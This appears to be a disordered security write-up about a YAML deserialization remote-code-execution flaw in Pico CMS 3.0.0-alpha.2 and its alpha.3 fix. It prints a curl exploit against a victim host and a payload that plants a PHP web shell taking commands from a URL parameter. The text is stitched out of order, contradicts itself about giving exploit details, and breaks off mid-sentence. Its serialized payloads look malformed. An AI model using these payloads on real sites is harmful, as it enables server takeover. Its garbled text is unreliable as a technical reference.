The Pico team has released Pico 3.0.0-alpha.3 which replaces parseYaml() with a secure wrapper:
// Fixed code (Symfony Yaml component)
use Symfony\Component\Yaml\Parser;
use Symfony\Component\Yaml\Yaml;

$yamlParser = new Parser();
// Yaml::PARSE_OBJECT_FOR_MAP only turns mappings into stdClass; without
// Yaml::PARSE_OBJECT the parser rejects !php/object tags instead of unserializing them.
$parsed = $yamlParser->parse($yamlString, Yaml::PARSE_OBJECT_FOR_MAP);
Do not use alpha.2 in production. Ever.
The root cause lies in a dangerous combination of two features introduced in the alpha branch: Twig template caching and YAML parameter parsing.
Pico 3.0.0-alpha.2 Exploit
A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.
!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"
Once shell.php is written, the attacker has permanent access.
The attacker sends a POST request to the index page with a malicious YAML payload in the X-Pico-Debug header (or a theme parameter).
curl -X POST https://victim.com/pico/ \
-H "X-Pico-Debug: !php/object \"O:1:\"S\":1:s:4:\"exec\";s:18:\"system('id > pwn.txt')\";\"" \
-d "content=test"
Without specific details on the exploit, we can discuss general implications and how such vulnerabilities are typically addressed:
To understand how this exploit evolved, review the timeline: